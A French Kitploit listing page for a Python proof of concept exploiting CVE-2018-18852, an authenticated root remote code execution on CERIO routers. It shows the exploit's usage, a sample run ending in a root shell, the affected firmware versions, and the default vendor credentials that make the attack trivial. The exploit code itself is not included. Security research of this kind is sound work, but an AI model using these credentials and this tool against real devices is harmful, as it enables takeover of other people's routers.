Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-18852 — CERIO RCE CVE-2018-18852, exécution de code à distance (RCE) authentifiée (identifiants par défaut du fabricant) via le web en tant qu'utilisateur root. | Kitploit
Outils/GitHubGitHub/andripwn/cve-2018-18852
Sécurité des Systèmes EmbarquésSécurité IoTAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebOutil d'Accès à Distance
GitHubandripwn/cve-2018-18852

CVE-2018-18852

CERIO RCE CVE-2018-18852, exécution de code à distance (RCE) authentifiée (identifiants par défaut du fabricant) via le web en tant qu'utilisateur root.

Voir le dépôt
111il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RCE authentifiée sur routeur CERIO (identifiants backdoor du constructeur) CVE-2018-18852 PoC Python

hook-s3c (github.com/andripwn), @andripwn sur Twitter

PoC Python fonctionnel pour CVE-2018-18852, initialement publié sur ; https://github.com/andripwn/CVE-2018-18852

Présentation

Les modèles et variantes de routeurs CERIO, DT300N, DT100G, AMR-3204, WMR-200N sont vulnérables à une RCE authentifiée via le web avec les droits root.

Existe en tant qu'avis 0day non divulgué ; https://www.fortiguard.com/zeroday/FG-VD-18-149

Les identifiants par défaut du constructeur sont généralement présents, ce qui rend l'exécution triviale.

L'architecture est MIPS.

Utilisation et exemple

root@kitploit:~
Usage: exploit.py <ipaddress> <port> <creds>
root@kitploit:~

$ python ./exploit.py 127.0.0.1 8080 admin:admin

[*] ================================================
[*] CERIO RCE CVE-2018-18852, confirmed on;
[*] - CERIO DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3
[*] - CERIO DT-300N       - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7
[*] - CERIO DT-100G-N     - fw: Cen-AP-N2H10A V1.0.8
[*] - CERIO DT-100G       - fw: Cen-WR-G2H5 V1.0.7
[*] - CERIO DT-100GX-N    - fw: Cen-AP-N2H8A V1.0.18
[*] - CERIO AMR-3204G     - fw: Cen-AC V2.0.19
[*] - CERIO WMR-200N      - fw: Cen-HS-N2H1 V1.0.6c Test
[*]
[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852
[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, 
[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee
[/] Go cop YTCracker's Introducing Neals, gov overreach is no joke - wake the fuck up
[*] ================================================

root@cerio:~# id
[!] This may not be the right model (DT-300N-NGS-M), trying again
[+] Sucessfully grabbed pid token: 1312


uid=0(root) gid=0(root)

root@cerio:~# 

Combinaisons d'identifiants par défaut ;

  • operator:1234
  • admin:admin
  • root:default

Salutations

Merci à vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee Allez vous procurer Introducing Neals de YTCracker, l'abus de pouvoir du gouvernement n'est pas une blague - réveillez-vous, putain

HTP!!!! YEET

Télécharger l’outil